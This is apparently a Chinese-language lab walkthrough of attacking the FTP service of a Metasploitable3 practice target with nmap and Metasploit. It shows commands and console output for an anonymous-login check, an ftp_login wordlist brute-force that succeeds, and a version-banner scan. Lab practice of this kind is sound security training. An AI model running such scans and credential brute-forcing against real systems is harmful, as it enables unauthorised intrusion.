Metasploit-ftp

说明

本编主要演示Metasploit对ftp的攻击，必须提前搭建好Metasploit攻击机和Metasploitable3靶场，可以参考这篇如何搭建kail和Metasploitable3靶场搭建

开始实践

• 在攻击机上，扫描靶场的端口，发现了ftp服务的端口为21

nmap -sV 192.168.56.102

Starting Nmap 7.92 ( https://nmap.org ) at 2022-02-23 21:42 EST
Nmap scan report for 192.168.56.102
Host is up (0.00033s latency).
Not shown: 981 closed tcp ports (conn-refused)
PORT      STATE SERVICE              VERSION
21/tcp    open  ftp                  Microsoft ftpd
22/tcp    open  ssh                  OpenSSH 7.1 (protocol 2.0)
80/tcp    open  http                 Microsoft IIS httpd 7.5
135/tcp   open  msrpc                Microsoft Windows RPC
139/tcp   open  netbios-ssn          Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds         Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
3306/tcp  open  mysql                MySQL 5.5.20-log
3389/tcp  open  ssl/ms-wbt-server?
4848/tcp  open  ssl/http             Oracle Glassfish Application Server
7676/tcp  open  java-message-service Java Message Service 301
8080/tcp  open  http                 Sun GlassFish Open Source Edition  4.0
8181/tcp  open  ssl/intermapper?
8383/tcp  open  http                 Apache httpd
9200/tcp  open  wap-wsp?
49152/tcp open  msrpc                Microsoft Windows RPC
49153/tcp open  msrpc                Microsoft Windows RPC
49154/tcp open  msrpc                Microsoft Windows RPC
49155/tcp open  msrpc                Microsoft Windows RPC
49176/tcp open  java-rmi             Java RMI

直接输入msfconsole 就进入到了metasploit 的控制台下

msfconsole
                                                  

       =[ metasploit v6.1.14-dev                          ]
+ -- --=[ 2180 exploits - 1155 auxiliary - 399 post       ]
+ -- --=[ 592 payloads - 45 encoders - 10 nops            ]
+ -- --=[ 9 evasion                                       ]

Metasploit tip: Open an interactive Ruby terminal with 
irb

msf6 > 

• 输入search scanner/ftp找到辅助的扫描工具

• 下面使用三个漏洞模块（anonymous、ftp_login、ftp_version)测试，也是网上教程最多的笔记

auxiliary/scanner/ftp/anonymous

测试结论

不支持匿名登录

开始演练

• 输入use auxiliary/scanner/ftp/anonymous ，表示使用这个匿名登录漏洞模块

msf6 > use auxiliary/scanner/ftp/anonymous

• 设置rhosts

msf6 > set RHOSTS 192.168.56.102

• 输入run，就是运行漏洞模块，看看是否成功，测试结果是匿名登录失败

sf6 auxiliary(scanner/ftp/anonymous) > run

[*] 192.168.56.102:21     - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

• 也可以直接输入expolit -i 运行漏洞模块

msf6 auxiliary(scanner/ftp/anonymous) > exploit -i

[*] 192.168.56.102:21     - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/ftp/anonymous) > 

• 网上找了个成功的图片

总结

• 如果想匿名登录，可以直接到靶机中的iis中设置ftp支持匿名登录
• 匿名登录后，有些文件只是只读，有些重要文件还是可能泄露一些重要信息

auxiliary/scanner/ftp/ftp_login

测试结论

登录成功，核心文件还是密码字典

开始演练

• 输入use auxiliary/scanner/ftp/ftp_login，表示使用这个漏洞模块

msf6 > use auxiliary/scanner/ftp/ftp_login
msf6 auxiliary(scanner/ftp/ftp_login) > 

• 输入show options，展示当前ftp_login扫描工具的选项

msf6 auxiliary(scanner/ftp/ftp_login) > show options

Module options (auxiliary/scanner/ftp/ftp_login):

   Name              Current Setting  Required  Description
   ----              ---------------  --------  -----------
   BLANK_PASSWORDS   false            no        Try blank passwords for all users
   BRUTEFORCE_SPEED  5                yes       How fast to bruteforce, from 0 to 5
   DB_ALL_CREDS      false            no        Try each user/password couple stored in the current database
   DB_ALL_PASS       false            no        Add all passwords in the current database to the list
   DB_ALL_USERS      false            no        Add all users in the current database to the list
   DB_SKIP_EXISTING  none             no        Skip existing credentials stored in the current database (Accepted: none, user, user&realm)
   PASSWORD                           no        A specific password to authenticate with
   PASS_FILE                          no        File containing passwords, one per line
   Proxies                            no        A proxy chain of format type:host:port[,type:host:port][...]
   RECORD_GUEST      false            no        Record anonymous/guest logins to the database
   RHOSTS                             yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
   RPORT             21               yes       The target port (TCP)
   STOP_ON_SUCCESS   false            yes       Stop guessing when a credential works for a host
   THREADS           1                yes       The number of concurrent threads (max one per host)
   USERNAME                           no        A specific username to authenticate as
   USERPASS_FILE                      no        File containing users and passwords separated by space, one pair per line
   USER_AS_PASS      false            no        Try the username as the password for all users
   USER_FILE                          no        File containing usernames, one per line
   VERBOSE           true             yes       Whether to print output for all attempts

• 设置好了RHOSTS

msf6 auxiliary(scanner/ftp/ftp_login) > set RHOSTS 192.168.56.102

• 设置线程数

msf6 auxiliary(scanner/ftp/ftp_login) >  set THREADS 14

• 设置用户名和密码文件，这里的用户和密码是metasploit自带的，我最后加了个用户名和密码（vagrant）

msf6 auxiliary(scanner/ftp/ftp_login) >set USERPASS_FILE /usr/share/metasploit-framework/data/wordlists/root_userpass.txt

• 输入show options查看配置情况

• 直接运行

msf6 auxiliary(scanner/ftp/ftp_login) > run

• 发现登录成功

auxiliary/scanner/ftp/ftp_version

测试结论

测试失败，网上很多都是基于这个模块拿到root权限，失败原因分析：

• msf版本不一致，我的是msf6最新版本，其他人的版本比我旧
• 靶场系统不一致，有的人的靶场是linux，而我的靶场为window 2008 r2

开始演练

msf6 auxiliary(scanner/ftp/easy_file_sharing_ftp) > use auxiliary/scanner/ftp/ftp_version  
msf6 auxiliary(scanner/ftp/ftp_version) > set RHOSTS 192.168.56.102
RHOSTS => 192.168.56.102
msf6 auxiliary(scanner/ftp/ftp_version) > run

[+] 192.168.56.102:21     - FTP Banner: '220 Microsoft FTP Service\x0d\x0a'
[*] 192.168.56.102:21     - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

• run时并没有扫描出来ftp的版本信息
• 我看其这个人博客写到

• 然后他用下面的后门模块最终拿到root